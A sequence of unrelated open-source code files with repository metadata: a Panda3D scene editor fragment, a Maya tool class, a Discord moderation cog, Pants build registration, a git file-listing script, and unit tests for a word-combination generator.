newScale = Point3(scale.getX() + (overAllScale + self.keyControlEventDict['KeyScaleXUp']*self.keyboardSpeedDict['SpeedScaleXUp'] - self.keyControlEventDict['KeyScaleXDown']*self.keyboardSpeedDict['SpeedScaleXDown'])*delta,
scale.getY() + (overAllScale + self.keyControlEventDict['KeyScaleYUp']*self.keyboardSpeedDict['SpeedScaleYUp'] - self.keyControlEventDict['KeyScaleYDown']*self.keyboardSpeedDict['SpeedScaleYDown'])*delta,
scale.getZ() + (overAllScale + self.keyControlEventDict['KeyScaleZUp']*self.keyboardSpeedDict['SpeedScaleZUp'] - self.keyControlEventDict['KeyScaleZDown']*self.keyboardSpeedDict['SpeedScaleZDown'])*delta
)
self.controlTarget.setPos(newPos.getX(), newPos.getY() , newPos.getZ())
self.controlTarget.setHpr(newHpr.getX(), newHpr.getY() , newHpr.getZ())
self.controlTarget.setScale(newScale.getX(),newScale.getY(),newScale.getZ())
self.transNodeKeyboard.setPosHpr(0,0,0,0,0,0)
return Task.cont
## Misc
##### This one get the event from SGE (Scene Graph Explorer) and Picking
def selectNode(self, nodePath=None, callBack = True):
################################################################
# selectNode(self, nodePath=None, callBack = True)
# This will be called when user try to select nodes from the
# side window.
# It will also call seSession to select this node in order to keep data's consistency
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
if callBack:
self.seSession.select(nodePath,fResetAncestry=1)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def selectFromScene(self, nodePath=None, callBack=True):
################################################################
# selectFromScene(self, nodePath=None, callBack = True)
# This will be called when user try to select nodes from the
# scene. (By picking)
# Actually this will be called by seSession
# The reason we make two selections is we don't want they call each other and never stop...
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
self.sideWindow.SGE.selectNodePath(nodePath,callBack)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def monitorSelectedNodeTask(self, task):
################################################################
# monitorSelectedNodeTask(self, task)
# This is a function which will keep tracking
# the position, orientation and scale data of selected node and update the display on the screen.
# Alos, it will send out message to sychronize the data in the placer and property window.
################################################################
if self.nodeSelected != None:
pos = self.nodeSelected.getPos()
hpr = self.nodeSelected.getHpr()
scale = self.nodeSelected.getScale()
if ((self.oPos != pos )or(self.oScale != scale)or(self.oHpr != hpr)):
messenger.send('forPorpertyWindow'+self.nodeSelected.getName(),[pos, hpr, scale])
messenger.send('placerUpdate')
self.oPos = pos
self.oScale = scale
self.oHpr = hpr
self.posLabel['text'] = "Position : X: %2.2f Y: %2.2f Z: %2.2f"%(pos.getX(), pos.getY(),pos.getZ())
self.hprLabel['text'] = "Orientation: H: %2.2f P: %2.2f R: %2.2f"%(hpr.getX(), hpr.getY(),hpr.getZ())
self.scaleLabel['text'] = "Scale : X: %2.2f Y: %2.2f Z: %2.2f"%(scale.getX(), scale.getY(),scale.getZ())
return Task.cont
def deselectFromScene(self):
################################################################
# deselectFromScene(self)
# This function will do nothing but call other function
# to delete selected node...
#
# Ok... this is really redundancy...
#
################################################################
self.deSelectNode(self.nodeSelected)
messenger.send('SGE_Update Explorer',[render])
##### Take care the even quest from Side Window
def lightToggle(self):
################################################################
# lightToggle(self)
# This function will do nothing but call other function
# to toggle the light...
################################################################
self.makeDirty()
AllScene.toggleLight()
return
def sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
################################################################
# sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
# backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
# This function will be called when user close the side window.
# Here we will restore all parameters about world setting back in the sceneEditor.
# So, when next time people recall the side window, it will still keep the same world setting.
################################################################
if self.sideWindowCount==1:
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
self.sideWindowCount=0
self.sideWindow = None
self.menuPanel.entryconfig('Side Window', state=NORMAL)
return
## Process message from Duplication Window
def duplicationObj(self, nodePath, pos, hpr, scale, num):
################################################################
# duplicationObj(self, nodePath, pos, hpr, scale, num)
# This function will do nothing but call other function
# to duplicate selected node...
#
# Ok... this is really redundancy...
#
################################################################
AllScene.duplicateObj(nodePath, pos, hpr, scale, num)
return
## Process message from Animation Panel
def animationLoader(self, nodePath, Dic):
name = nodePath.getName()
AllScene.loadAnimation(name, Dic)
return
def animationRemove(self, nodePath, name):
AllScene.removeAnimation(nodePath.getName(),name)
return
def animPanelClose(self, name):
if self.animPanel.has_key(name):
del self.animPanel[name]
return
### Blend Animation Panel
def openBlendAnimPanel(self, nodePath=None):
################################################################
# openBlendAnimPanel(self, nodePath=None)
# This function will get the user defined blending animation data from dataHolder.
# And then open a blendAnimPanel by passing those data in.
################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animBlendPanel.has_key(name):
print '---- You already have an Blend Animation Panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
Dict = AllScene.getBlendAnimAsDict(name)
self.animBlendPanel[name] = BlendAnimPanel(aNode=Actor, blendDict=Dict)
pass
return
def animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect):
################################################################
# animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect)
# This function will call dataHolder to save the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.saveBlendAnim(actorName, blendName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelRemove(self, actorName, blendName):
################################################################
# animBlendPanelRemove(self, actorName, blendName)
# This function will call dataHolder to remove the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.removeBlendAnim(actorName, blendName)
self.animBlendPanel[actorName].setBlendAnimList(dict, True)
return
def animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect):
################################################################
# animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect)
# This function will call dataHolder to rename the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.renameBlendAnim(actorName, nName, oName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelClose(self, name):
################################################################
# animBlendPanelClose(self, name)
# This function will be called when Blend panel has been closed.
# Here we will reset the reference dictionary so it can be open again.
################################################################
if self.animBlendPanel.has_key(name):
del self.animBlendPanel[name]
return
## Process message from SEditor object
def toggleWidgetVis(self):
################################################################
# toggleWidgetVis(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWidgetVisFromMainW()
else:
self.widgetVis = (self.widgetVis+1)%2
def toggleBackface(self):
################################################################
# toggleBackface(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleBackfaceFromMainW()
else:
self.backface = (self.backface+1)%2
def toggleTexture(self):
################################################################
# toggleTexture(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleTextureFromMainW()
else:
self.texture = (self.texture+1)%2
def toggleWireframe(self):
################################################################
# toggleWireframe(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWireframeFromMainW()
else:
self.wireframe = (self.wireframe+1)%2
def openAlignPanel(self, nodePath=None):
name = nodePath.getName()
if not self.alignPanelDict.has_key(name):
list = AllScene.getAllObjNameAsList()
if name in list:
list.remove(name)
else:
return
self.alignPanelDict[name] = AlignTool(nodePath = nodePath, list = list)
return
def closeAlignPanel(self, name=None):
if self.alignPanelDict.has_key(name):
del self.alignPanelDict[name]
def alignObject(self, nodePath, name, list):
target = AllScene.getObjFromSceneByName(name)
pos = target.getPos()
hpr = target.getHpr()
scale = target.getScale()
if list[0]: # Align X
nodePath.setX(pos.getX())
if list[1]: # Align Y
nodePath.setY(pos.getY())
if list[2]: # Align Z
nodePath.setZ(pos.getZ())
if list[3]: # Align H
nodePath.setH(hpr.getX())
if list[4]: # Align P
nodePath.setP(hpr.getY())
if list[5]: # Align R
nodePath.setR(hpr.getZ())
if list[6]: # Scale X
nodePath.setSx(scale.getX())
if list[7]: # Scale Y
nodePath.setSy(scale.getY())
if list[8]: # Scale Z
nodePath.setSz(scale.getZ())
return
### Event from Motion Path Panel
def requestCurveList(self, nodePath,name):
curveList = AllScene.getCurveList(nodePath)
messenger.send('curveListFor'+name, [curveList])
## Steal from DirectSession...
def flash(self, nodePath = 'None Given'):
""" Highlight an object by setting it red for a few seconds """
# Clean up any existing task
taskMgr.remove('flashNodePath')
# Spawn new task if appropriate
if nodePath == 'None Given':
# If nothing specified, try selected node path
nodePath = self.selected.last
if nodePath:
if nodePath.hasColor():
doneColor = nodePath.getColor()
flashColor = VBase4(1) - doneColor
flashColor.setW(1)
else:
doneColor = None
flashColor = VBase4(1,0,0,1)
# Temporarily set node path color
nodePath.setColor(flashColor)
# Clean up color in a few seconds
t = taskMgr.doMethodLater(1.5,
# This is just a dummy task
self.flashDummy,
'flashNodePath')
t.nodePath = nodePath
t.doneColor = doneColor
# This really does all the work
t.uponDeath = self.flashDone
def flashDummy(self, state):
# Real work is done in upon death function
return Task.done
def flashDone(self,state):
# Return node Path to original state
if state.nodePath.isEmpty():
# Node path doesn't exist anymore, bail
return
if state.doneColor:
state.nodePath.setColor(state.doneColor)
else:
state.nodePath.clearColor()
editor = myLevelEditor(parent = base.tkRoot)
run()
| {
"content_hash": "eab1b1a0d231e6407e97b6f1d6359e82",
"timestamp": "",
"source": "github",
"line_count": 1707,
"max_line_length": 230,
"avg_line_length": 44.85120093731693,
"alnum_prop": 0.5351157900236413,
"repo_name": "jjkoletar/panda3d",
"id": "e47df9ddcbdbcbafa47840497f30110cedca1ce9",
"size": "76562",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "contrib/src/sceneeditor/sceneEditor.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "6435690"
},
{
"name": "C++",
"bytes": "31389522"
},
{
"name": "Emacs Lisp",
"bytes": "166274"
},
{
"name": "HTML",
"bytes": "8081"
},
{
"name": "Java",
"bytes": "3777"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Logos",
"bytes": "5504"
},
{
"name": "NSIS",
"bytes": "91955"
},
{
"name": "Nemerle",
"bytes": "7733"
},
{
"name": "Objective-C",
"bytes": "12290"
},
{
"name": "Objective-C++",
"bytes": "298197"
},
{
"name": "Pascal",
"bytes": "53710"
},
{
"name": "Perl",
"bytes": "206982"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "752377"
},
{
"name": "Python",
"bytes": "5860103"
},
{
"name": "Rebol",
"bytes": "421"
},
{
"name": "Shell",
"bytes": "59984"
},
{
"name": "Visual Basic",
"bytes": "136"
}
],
"symlink_target": ""
} |
"""
Coplanar joint orient tool 0.9.0
Ilya Seletsky 2015
TODO (known issues):
-Preview plane size setting (Width and Height)
-Handle when scene is closed while window open to reset things if possible
-Make the preview plane creation somehow not contribute to the undo history if possible or find a different way to display a preview plane
-Save settings between runs.
-Fix window not shrinking properly when switching between plane modes.
-Figure out what else crashes
Stretch goals:
-Joint preview. Preview of how the joints will be oriented in real time without hitting apply button.
-Interactive plane mode. Move a plane around in real time
-See if I can make UI more intuitive/self documenting and with a bunch of pretty pictures
-Auto compute preview plane size and position based on selected joints.
-Optimize UI change code to prevent unnecessary updates. Not a real huge issue.
-Redo UI with pyQt to make the UI be more versatile and resizeable and strings localizeable, etc...
"""
"""
Wrapper around some value and its associated UI, and makes the two stay in sync
"""
class ValueBase(object):
def __init__(self):
self.value = None
self.rootUI = None
self.onChangeFunc = None
def setValue(self, value):
pass
def callChangeFunc(self):
if(self.onChangeFunc is not None):
self.onChangeFunc(self.value)
def setEnabled(self, enabled):
pass | {
"content_hash": "b305a4047c5f58cd27b1fe123bcbf6df",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 138,
"avg_line_length": 37.61538461538461,
"alnum_prop": 0.7191547375596455,
"repo_name": "ill/CoplanarJointOrient",
"id": "508622f349766c878143f0d8e4b7cdd4d4b93302",
"size": "1467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MayaUIValue/ValueBase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "79748"
}
],
"symlink_target": ""
} |
import discord
from discord.ext import commands
AVOID = ['342891382584770560', '300564141096304650', '360722519860445184', '312038519294001152', '321832332279676928']
class Modtools:
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
async def propagateMute(self, ctx):
if self.bot.Henry(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
overwrite = discord.PermissionOverwrite()
setattr(overwrite, 'send_messages', False)
setattr(overwrite, 'manage_messages', False)
setattr(overwrite, 'manage_channels', False)
setattr(overwrite, 'manage_server', False)
setattr(overwrite, 'manage_nicknames', False)
setattr(overwrite, 'manage_roles', False)
for channel in ctx.message.server.channels:
if channel.id not in AVOID:
await self.bot.edit_channel_permissions(channel, MUTED_ROLE, overwrite)
# @commands.command(pass_context=True)
# async def lock(self, ctx):
# """Locks the current channel."""
# for role in ctx.message.server.roles:
# if role.id == '338575090847580160':
# MUTED_ROLE = role
# if role.id == '296466915235332106':
# BOTS_ROLE = role
# if self.minion(ctx):
# everyone = []
# for user in ctx.message.server.members:
# if ctx.message.channel.permissions_for(user).send_messages and BOTS_ROLE not in user.roles: #don't mute bots
# everyone.append(user)
# for user in everyone:
# await self.bot.add_roles(user, MUTED_ROLE)
# await self.bot.say("Locking Channel")
# else:
# await self.bot.say("You ain't no mod, shoo!")
@commands.command(pass_context=True)
async def unlock(self, ctx):
"""Unlocks the current channel."""
if self.minion(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
everyone = []
for user in ctx.message.server.members:
if ctx.message.channel.permissions_for(user).send_messages:
everyone.append(user)
for user in everyone:
if MUTED_ROLE in user.roles:
await self.bot.remove_roles(user, MUTED_ROLE)
await self.bot.say("Unlocking Channel")
else:
await self.bot.say("You ain't no mod, shoo!")
async def ch_perms(self, channel, user, value):
"""Helper function"""
overwrite = discord.PermissionOverwrite()
overwrite.send_messages = value
await self.bot.edit_channel_permissions(channel, user, overwrite)
@commands.command(pass_context=True)
async def unrestrict(self, ctx, *msg):
"""Undo any restrictions on a user for all channels.
Usage: !unrestrict [users..]
"""
if self.minion(ctx):
channels = ctx.message.server.channels
for user in ctx.message.mentions:
await self.bot.say("Unrestricting user "+user.name)
for ch in channels:
await self.ch_perms(ch, user, None) #None sets to default(inherited) value.
else:
await self.bot.say("You ain't no mod, shoo!")
@commands.command(pass_context=True)
async def restrict(self, ctx):
if self.minion(ctx):
for role in ctx.message.server.roles:
if role.id == '338575090847580160':
MUTED_ROLE = role
await self.bot.add_roles(ctx.message.mentions[0], MUTED_ROLE)
await self.bot.say("{} has been muted.".format(ctx.message.mentions[0].mention))
else:
await self.bot.say("You ain't no mod, shoo!")
def minion(self, ctx):
for role in ctx.message.author.roles:
if "314296819272122368" == role.id:
return True
return False
@commands.command(pass_context=True)
async def modsay(self, ctx, *msg):
"""Give a stern message.
Heavily inspired by brenfan's .em code <3
"""
author = ctx.message.author
if author.permissions_in(ctx.message.channel).manage_channels or author.server_permissions.manage_channels:
try:
color = red
except Exception:
color = discord.Colour(0xff0000)
string = "\n\n["+" ".join(msg)+"]()"
embed = discord.Embed(description = string, color = color, title="An Echo From the Heavens Says...", footer="Moderator Warning")
embed.set_author(name=author.display_name, icon_url = author.avatar_url)
embed.set_footer(text="Moderator Warning")
await self.bot.say(embed=embed)
try:
await self.bot.delete_message(ctx.message)
except Exception:
print("Not allowed to delete message")
@commands.command(pass_context=True)
async def clear(self, ctx, amount):
"""Clear set amount of messages
"""
if len(ctx.message.mentions) > 0:
send_msg = await self.bot.say("Feature coming. Bug Henry.")
# await self.bot.purge_from(ctx.message.channel, limit = 50, check=is_me)
else:
await self.bot.purge_from(ctx.message.channel, limit = amount, check=True)
send_msg = await self.bot.say("{} message(s) has been deleted.".format(amount))
await asyncio.sleep(3)
await self.bot.delete_message(send_msg)
def setup(bot):
bot.add_cog(Modtools(bot))
| {
"content_hash": "f427561e59e699ffecb931857763bace",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 134,
"avg_line_length": 36.52482269503546,
"alnum_prop": 0.6566990291262136,
"repo_name": "matthew-morrison/csss-minion",
"id": "9ad3d7b62be83b51903c09bbc948de1c39cc4602",
"size": "5150",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "modtools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "26"
},
{
"name": "Python",
"bytes": "143033"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.python.pants_requirement import PantsRequirement
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_requirements import PythonRequirements
from pants.backend.python.targets.python_app import PythonApp
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_distribution import PythonDistribution
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.backend.python.tasks.build_local_python_distributions import \
BuildLocalPythonDistributions
from pants.backend.python.tasks.gather_sources import GatherSources
from pants.backend.python.tasks.local_python_distribution_artifact import \
LocalPythonDistributionArtifact
from pants.backend.python.tasks.pytest_prep import PytestPrep
from pants.backend.python.tasks.pytest_run import PytestRun
from pants.backend.python.tasks.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks.python_bundle import PythonBundle
from pants.backend.python.tasks.python_isort import IsortPythonTask
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.backend.python.tasks.python_run import PythonRun
from pants.backend.python.tasks.resolve_requirements import ResolveRequirements
from pants.backend.python.tasks.select_interpreter import SelectInterpreter
from pants.backend.python.tasks.setup_py import SetupPy, create_setup_py_rules
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.resources import Resources
from pants.goal.task_registrar import TaskRegistrar as task
def build_file_aliases():
return BuildFileAliases(
targets={
PythonApp.alias(): PythonApp,
PythonBinary.alias(): PythonBinary,
PythonLibrary.alias(): PythonLibrary,
PythonTests.alias(): PythonTests,
PythonDistribution.alias(): PythonDistribution,
'python_requirement_library': PythonRequirementLibrary,
Resources.alias(): Resources,
},
objects={
'python_requirement': PythonRequirement,
'python_artifact': PythonArtifact,
'setup_py': PythonArtifact,
},
context_aware_object_factories={
'python_requirements': PythonRequirements,
'pants_requirement': PantsRequirement,
}
)
def register_goals():
task(name='interpreter', action=SelectInterpreter).install('pyprep')
task(name='build-local-dists', action=BuildLocalPythonDistributions).install('pyprep')
task(name='requirements', action=ResolveRequirements).install('pyprep')
task(name='sources', action=GatherSources).install('pyprep')
task(name='py', action=PythonRun).install('run')
task(name='pytest-prep', action=PytestPrep).install('test')
task(name='pytest', action=PytestRun).install('test')
task(name='py', action=PythonRepl).install('repl')
task(name='setup-py', action=SetupPy).install()
task(name='py', action=PythonBinaryCreate).install('binary')
task(name='py-wheels', action=LocalPythonDistributionArtifact).install('binary')
task(name='isort', action=IsortPythonTask).install('fmt')
task(name='py', action=PythonBundle).install('bundle')
def rules():
return create_setup_py_rules()
| {
"content_hash": "79a0abe7e9168c5c2474ab5aafe0bf91",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 93,
"avg_line_length": 48.5945945945946,
"alnum_prop": 0.7906006674082313,
"repo_name": "baroquebobcat/pants",
"id": "e8cb9dae58141ae0de1d0757e2fa8bc475488f6e",
"size": "3743",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/python/pants/backend/python/register.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "343"
},
{
"name": "C++",
"bytes": "1138"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "2347"
},
{
"name": "HTML",
"bytes": "49289"
},
{
"name": "Java",
"bytes": "490864"
},
{
"name": "JavaScript",
"bytes": "33289"
},
{
"name": "Python",
"bytes": "5907131"
},
{
"name": "Rust",
"bytes": "494664"
},
{
"name": "Scala",
"bytes": "76065"
},
{
"name": "Shell",
"bytes": "75742"
},
{
"name": "Thrift",
"bytes": "2953"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from __future__ import absolute_import
import os
from os.path import abspath
import sys
import subprocess
import re
from collections import defaultdict
import argparse
from six.moves import filter
from typing import Union, List, Dict
def get_ftype(fpath, use_shebang):
# type: (str, bool) -> str
ext = os.path.splitext(fpath)[1]
if ext:
return ext[1:]
elif use_shebang:
# opening a file may throw an OSError
with open(fpath) as f:
first_line = f.readline()
if re.search(r'^#!.*\bpython', first_line):
return 'py'
elif re.search(r'^#!.*sh', first_line):
return 'sh'
elif re.search(r'^#!.*\bperl', first_line):
return 'pl'
elif re.search(r'^#!.*\bnode', first_line):
return 'js'
elif re.search(r'^#!.*\bruby', first_line):
return 'rb'
elif re.search(r'^#!', first_line):
print('Error: Unknown shebang in file "%s":\n%s' % (fpath, first_line), file=sys.stderr)
return ''
else:
return ''
else:
return ''
def list_files(targets=[], ftypes=[], use_shebang=True, modified_only=False,
exclude=[], group_by_ftype=False):
# type: (List[str], List[str], bool, bool, List[str], bool) -> Union[Dict[str, List[str]], List[str]]
"""
List files tracked by git.
Returns a list of files which are either in targets or in directories in targets.
If targets is [], list of all tracked files in current directory is returned.
Other arguments:
ftypes - List of file types on which to filter the search.
If ftypes is [], all files are included.
use_shebang - Determine file type of extensionless files from their shebang.
modified_only - Only include files which have been modified.
exclude - List of paths to be excluded, relative to repository root.
group_by_ftype - If True, returns a dict of lists keyed by file type.
If False, returns a flat list of files.
"""
ftypes = [x.strip('.') for x in ftypes]
ftypes_set = set(ftypes)
# Really this is all bytes -- it's a file path -- but we get paths in
# sys.argv as str, so that battle is already lost. Settle for hoping
# everything is UTF-8.
repository_root = subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip().decode('utf-8')
exclude_abspaths = [os.path.join(repository_root, fpath).rstrip('/') for fpath in exclude]
cmdline = ['git', 'ls-files'] + targets
if modified_only:
cmdline.append('-m')
files_gen = (x.strip() for x in subprocess.check_output(cmdline, universal_newlines=True).split('\n'))
# throw away empty lines and non-files (like symlinks)
files = list(filter(os.path.isfile, files_gen))
result_dict = defaultdict(list) # type: Dict[str, List[str]]
result_list = [] # type: List[str]
for fpath in files:
# this will take a long time if exclude is very large
absfpath = abspath(fpath)
if any(absfpath == expath or absfpath.startswith(expath + '/')
for expath in exclude_abspaths):
continue
if ftypes or group_by_ftype:
try:
filetype = get_ftype(fpath, use_shebang)
except (OSError, UnicodeDecodeError) as e:
etype = e.__class__.__name__
print('Error: %s while determining type of file "%s":' % (etype, fpath), file=sys.stderr)
print(e, file=sys.stderr)
filetype = ''
if ftypes and filetype not in ftypes_set:
continue
if group_by_ftype:
result_dict[filetype].append(fpath)
else:
result_list.append(fpath)
if group_by_ftype:
return result_dict
else:
return result_list
if __name__=="__main__":
parser = argparse.ArgumentParser(description="List files tracked by git and optionally filter by type")
parser.add_argument('targets', nargs='*', default=[],
help='''files and directories to include in the result.
If this is not specified, the current directory is used''')
parser.add_argument('-m', '--modified', action='store_true', default=False, help='list only modified files')
parser.add_argument('-f', '--ftypes', nargs='+', default=[],
help="list of file types to filter on. All files are included if this option is absent")
parser.add_argument('--ext-only', dest='extonly', action='store_true', default=False,
help='only use extension to determine file type')
parser.add_argument('--exclude', nargs='+', default=[],
help='list of files and directories to exclude from results, relative to repo root')
args = parser.parse_args()
listing = list_files(targets=args.targets, ftypes=args.ftypes, use_shebang=not args.extonly,
modified_only=args.modified, exclude=args.exclude)
for l in listing:
print(l)
| {
"content_hash": "843f55d91d22daa7b405288041f357d5",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 112,
"avg_line_length": 42.15447154471545,
"alnum_prop": 0.6005785920925747,
"repo_name": "Vallher/zulip",
"id": "61ac5c12a9efe6e474a1f6fca991c1a2eef5acab",
"size": "5207",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/lister.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "164"
},
{
"name": "CSS",
"bytes": "182566"
},
{
"name": "CoffeeScript",
"bytes": "18435"
},
{
"name": "Groovy",
"bytes": "5515"
},
{
"name": "HTML",
"bytes": "385288"
},
{
"name": "JavaScript",
"bytes": "1571752"
},
{
"name": "Nginx",
"bytes": "1228"
},
{
"name": "PHP",
"bytes": "18930"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "383634"
},
{
"name": "Puppet",
"bytes": "95624"
},
{
"name": "Python",
"bytes": "1862563"
},
{
"name": "Ruby",
"bytes": "255867"
},
{
"name": "Shell",
"bytes": "32357"
}
],
"symlink_target": ""
} |
"""
Test if comibnations of words are working as expected.
"""
import unittest
from collections import Iterable
from tests.utils import get_words_generator
from itertools import product
from thechronic.utils import is_iterable
from thechronic.thechronic import TheChronic
class CombinationsTestCase(unittest.TestCase):
def _assert_iterable_contains(self, member, container):
if not is_iterable(member):
member = (member, )
for m in member:
self.assertIn(m, container)
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.TESTS_PATH = 'tests/'
cls.RES_PATH = cls.TESTS_PATH + 'res/'
cls.WORDS1_PATH = cls.RES_PATH + 'words1.txt'
cls.WORDS2_PATH = cls.RES_PATH + 'words2.txt'
def setUp(self):
self.words1 = ['cat', 'dog', 'rat']
self.words2 = ['the', 'chronic', '1992']
def tearDown(self):
pass
def test_combinations_one_word(self):
thechronic = TheChronic(words=self.words1)
# genreate combinations of one word only
res = list(thechronic.combine(num_words=1))
res = list(res)
self.assertEqual(len(res), 3)
self.assertCountEqual(res, self.words1)
# make sure that num_words defaults to 1
res = list(thechronic.combine())
self.assertEqual(len(res), 3)
self.assertCountEqual(res, self.words1)
def test_combinations_multiple_words_single_source(self):
thechronic = TheChronic(words=self.words1)
expected_result = [
'catcat', 'catdog', 'catrat',
'dogcat', 'dogdog', 'dograt',
'ratcat', 'ratdog', 'ratrat'
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 9)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1, repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 27)
self.assertCountEqual(res, expected_result)
def test_combinations_multiple_words_multiple_sources(self):
thechronic = TheChronic(words=[self.words1, self.words2])
expected_result = ['catcat', 'catdog', 'catrat', 'catthe', 'catchronic',
'cat1992',
'dogcat', 'dogdog', 'dograt', 'dogthe', 'dogchronic', 'dog1992',
'ratcat', 'ratdog', 'ratrat', 'ratthe', 'ratchronic', 'rat1992',
'thecat', 'thedog', 'therat', 'thethe', 'thechronic', 'the1992',
'chroniccat', 'chronicdog', 'chronicrat', 'chronicthe',
'chronicchronic', 'chronic1992',
'1992cat', '1992rat', '1992dog', '1992the', '1992chronic', '19921992',
]
res = list(thechronic.combine(num_words=2))
self.assertEqual(len(res), 36)
self.assertCountEqual(res, expected_result)
expected_result = get_words_generator(product(self.words1 + self.words2,
repeat=3))
res = list(thechronic.combine(num_words=3))
self.assertEqual(len(res), 216)
self.assertCountEqual(res, expected_result)
def test_combinations_with_build_up(self):
